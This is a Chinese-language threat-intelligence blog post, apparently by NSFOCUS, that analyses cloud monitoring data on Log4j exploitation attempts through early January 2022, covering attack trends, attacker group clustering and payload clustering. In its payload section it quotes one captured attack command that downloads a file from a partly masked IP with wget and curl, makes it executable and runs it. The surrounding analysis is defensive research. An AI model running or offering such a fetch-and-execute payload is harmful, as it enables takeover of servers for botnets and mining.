<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Log4j事件云端數據分析

    VSole2022-01-06 14:51:58

    Log4j漏洞攻擊影響范圍深遠,為了有效觀測、識別相關漏洞的攻擊情況,綠盟科技通過監測與跟蹤分析云端數據,洞察事件攻擊態勢,挖掘攻擊模式,加速關鍵攻擊事件的定位與研判。以下為基于綠盟云監測進行分析得到的數據,時間截止至2022年1月4日零時。

    一、 態勢觀測:Log4j攻擊趨勢

    從圖1可以看出,綠盟云端監測到的Log4j攻擊事件在漏洞曝光之初即呈現爆炸式增長的態勢。隨著政策響應、防護策略與攻擊目標、攻擊技戰術的博弈,攻擊事件爆發初期出現波動但持續增長,于12月19日達到攻擊頂峰,隨后呈現整體下降的態勢。從攻擊源的地理位置分布來看,前期以國內攻擊源為主,12月14日后,國外攻擊源大幅增加,并在后續時間段內保持與國內攻擊源一致的攻擊規模和攻擊數量趨勢。

    圖1 Log4j攻擊事件國內外攻擊源數量趨勢


    此外,在綠盟云端的監測節點中,檢測到Log4j攻擊的設備占比在第一周快速升高,并在第二周后趨于平穩。截至2022年1月4日,已累計有近17%的防護站點監測到該類型攻擊。

    圖2  檢測到Log4j攻擊的云端節點數量趨勢



    二、 團伙行為觀測




    云端監控的優勢在于能夠通過全局視角觀測攻擊者、攻擊團伙的跨域攻擊行為,以及整體的行為模式演化。圖3給出了采樣數據中,部署在不同位置監測設備(紫色節點)監控下的攻擊者(源IP)關聯關系。可以看出有較為明顯的團簇現象。一方面,少量受害者站點受到了大規模攻擊源的集中攻擊;另一方面,攻擊團伙利用大規模攻擊基礎設施,對指定的受害者群體發起了大規模的掃描與攻擊行為。

    圖3 Log4j攻擊事件跨域行為



    三、 事件精細分診




    為了細粒度觀測Log4j攻擊事件的攻擊手法,實現在大規模事件下的事件準確研判,綠盟科技基于數據分析方法,對事件進行細粒度分診。首先,通過已知指紋特征過濾提取已知攻擊行為模式,進而對事件載荷進行采樣、清洗、向量化、降維,并實現聚類分析,對所有事件進行模式壓縮。

    圖4 Log4j攻擊載荷聚類可視化


    通過降維聚類,可以對大部分同質攻擊載荷進行壓縮,整體壓縮率可達95%。聚類將全部事件分為幾十種不同類別,圖5分別列出了所有事件中占比最高的幾個攻擊模式類別。

    圖5 Log4j Top5攻擊模式類別趨勢


    對事件采樣并進行整體分診,剔除掉一些典型的掃描事件類簇,對不同統計模式的事件進行數量統計和標準化,各個聚類簇和關鍵字命中類別的每日攻擊數量趨勢如圖7所示。可以看到,具有明顯特征的大規模攻擊者及其攻擊行為(載荷層次)隨著時間推進而變化。例如,某些利用公共基礎設施的(如keyword1部分,awv********.cn公共dnslog平臺)攻擊利用行為在2021年12月12日后大幅減少,近期有所反彈。此外,如包含攻擊載荷的cluster3攻擊行為集中出現,其攻擊載荷為:


    wget http://152.*.*.150/py; curl -O http://152.*.*.150/py; chmod 777 py; ./py rce.x86

    圖6的峰值幅度對各個類別的數據自身規模進行歸一化,以更好的展示每一類攻擊載荷在長時間周期內的攻擊強度分布。可以看出整體上隨著時間的推進,綠盟云檢測到的攻擊載荷模式隨之演變。有些攻擊樣本及載荷,在整個時間周期內有持續性;大部分攻擊載荷模式,在不同的時間段出現,說明有不同攻擊手法、攻擊意圖的攻擊者涌現和消逝。

    圖6 Log4j Top5攻擊模式類別趨勢


    通過對上述數據的快速分診分析,我們發現絕大多數攻擊事件為漏洞掃描行為。除此之外,也定位到大量有實際漏洞利用動作的攻擊載荷,涉及下載挖礦腳本、mirai僵尸網絡傳播等類型。一些典型的攻擊載荷如圖7所示。

    圖7 Log4j攻擊載荷摘要



    四、 安全知識圖譜




    如圖8所示,從安全知識圖譜的分析中可以發現,圖譜中已涵蓋log4j的最新漏洞測試POCs,或利用腳本(Exploit-DB)和依賴log4j的組件或產品,以及國內外漏洞通告情況、緩解方案、漏洞可能關聯的潛在攻擊模式等。安全知識圖譜基于圖關聯統計分析log4j影響范圍和風險面狀況,同時產出log4j的關聯知識,自動生成檢測規則并應用在安全掃描器或資產掃描中,進一步深度安全自查,有效緩解企業安全風險管理問題。

    圖8 從安全知識圖譜中分析Log4j風險


    五、總結




    在云端大數據平臺上,我們能夠觀測攻擊事件的整體態勢和攻擊行為關聯行為模式,并以系統、全局的視角審視攻擊團伙行為,分析攻擊模式演變。基于云端知識圖譜與智能分診技術,能夠加速攻擊技戰術的研判,并生成高置信度的威脅情報,支撐高級威脅的精準和快速定位。



    相關推薦:

    安全知識圖譜 | 深挖兩安融合,加強風險防控

    安全知識圖譜 | 繪制軟件供應鏈知識圖譜,強化風險分析

    安全知識圖譜 | 威脅建模助力企業“建防御 抓運營”

    安全知識圖譜 | 網絡空間測繪助力安全防護“量體裁衣”

    安全知識圖譜 | 按圖索“跡” 追蹤溯源

    安全知識圖譜|知識圖譜視角下的威脅評估

    安全知識圖譜 | APT組織畫像歸因

    安全知識圖譜 | 構建APT組織圖譜,打破信息孤島效應

    攜手邁進認知智能|綠盟科技安全知識圖譜技術白皮書正式發布

    天樞啟智 | 綠盟科技獲得知識圖譜產品權威認證


    點擊“閱讀原文”下載綠盟科技安全知識圖譜技術白皮書


    大數據log4j
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    前言近期,微步在線研究響應中心通過蜜罐捕獲到 BillGates 家族的木馬樣本,該木馬通過最近爆發的 Log4j2 漏洞傳播。微步在線研究響應中心的安全研究人員分析蜜罐中捕獲到的相關攻擊數據發現,攻擊量在短短數日內呈現大幅上升趨勢。
    北京市消費者協會9日發布數據“殺熟”問題調查報告顯示,七成多受訪者認為仍然存在數據“殺熟”現象,六成多受訪者表示有過被數據“殺熟”經歷。近年來,互聯網消費數據“殺熟”問題備受關注。北京市消費者協會委托開展了互聯網消費數據“殺熟”問題調查活動。
    Log4j2漏洞甫一爆發,便在全球掀起軒然大波,影響范圍之廣,危害性之無出其右。Log4j2事件是一場典型的開源軟件導致的供應鏈事件,上游軟件提供商的漏洞殃及下游產業的產品提供者,依賴關系的錯綜復雜使影響范圍擴大,最終遍及整個網絡空間。Log4j2事件為安全廠商與網絡安全從業者敲響了警鐘,必須警惕開源軟件的供應鏈中暗藏的危機,并采取有效行動。
    GitHub作為全球最大的開源代碼托管平臺,抽樣分析發現至少5.8%的java開源項目受該漏洞影響。截止目前,距離官方第一次發布修復版本已近一周時間,GitHub上還有89%的受影響項目仍然沒有修復。作為頂級基金會,也是本次漏洞的「當事人」,Apache基金會管理了超過1000個java項目,其中仍有33.4%未修復。
    9日夜間,Apache Log4j2引發嚴重安全漏洞,疑似很多公司的服務器被掃描攻擊,一大批安全人員深夜修bug,堪稱“核彈級”漏洞。 經專家研判,該漏洞影響范圍極大,且利用方式十分簡單,攻擊者僅需向目標輸入一段代碼,不需要用戶執行任何多余操作即可觸發該漏洞,使攻擊者可以遠程控制用戶受害者服務器,90%以上基于java開發的應用平臺都會受到影響。
    近年來,個人數據的重要性已經越來越成為所有人的共識。有人曾形象地將個人數據比喻為“唐僧肉”,而將竊取個人數據的黑灰產業鏈比喻為“妖魔鬼怪”。數據流轉的全過程,就仿佛唐僧去西天取經的全過程,途中,隨時有被“妖魔鬼怪”非法竊取的風險,而一旦竊取,就進入到黑灰產業鏈,進入數據交易、參與到詐騙勒索中。為了不使唐僧肉進入到“妖魔鬼怪”的嘴巴里,各國對待個人數據的治理和保護,越來越嚴厲了,審查時間也越來越長。
    Log4j漏洞攻擊影響范圍深遠,為了有效觀測、識別相關漏洞的攻擊情況,綠盟科技通過監測與跟蹤分析云端數據,洞察事件攻擊態勢,挖掘攻擊模式,加速關鍵攻擊事件的定位與研判。以下為基于綠盟云監測進行分析得到的數據,時間截止至2022年1月4日零時。
    2021年12月9日,360漏洞云團隊在網上監測到一則 Apache Log4j任意代碼執行漏洞正在被廣泛利用的信息 。漏洞編號:暫無,漏洞威脅等級:嚴重。
    這篇文章,我嘗試讓所有技術相關的朋友都能看懂:這個注定會載入網絡安全史冊上的漏洞,到底是怎么一回事!
    昨日夜間,Apache Log4j2引發嚴重安全漏洞,疑似很多公司的服務器被掃描攻擊,一大批安全人員深夜修bug,堪稱“核彈級”漏洞。 經專家研判,該漏洞影響范圍極大,且利用方式十分簡單,攻擊者僅需向目標輸入一段代碼,不需要用戶執行任何多余操作即可觸發該漏洞,使攻擊者可以遠程控制用戶受害者服務器,90%以上基于java開發的應用平臺都會受到影響。 log4j是Apache的一個開源項目,是一個
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类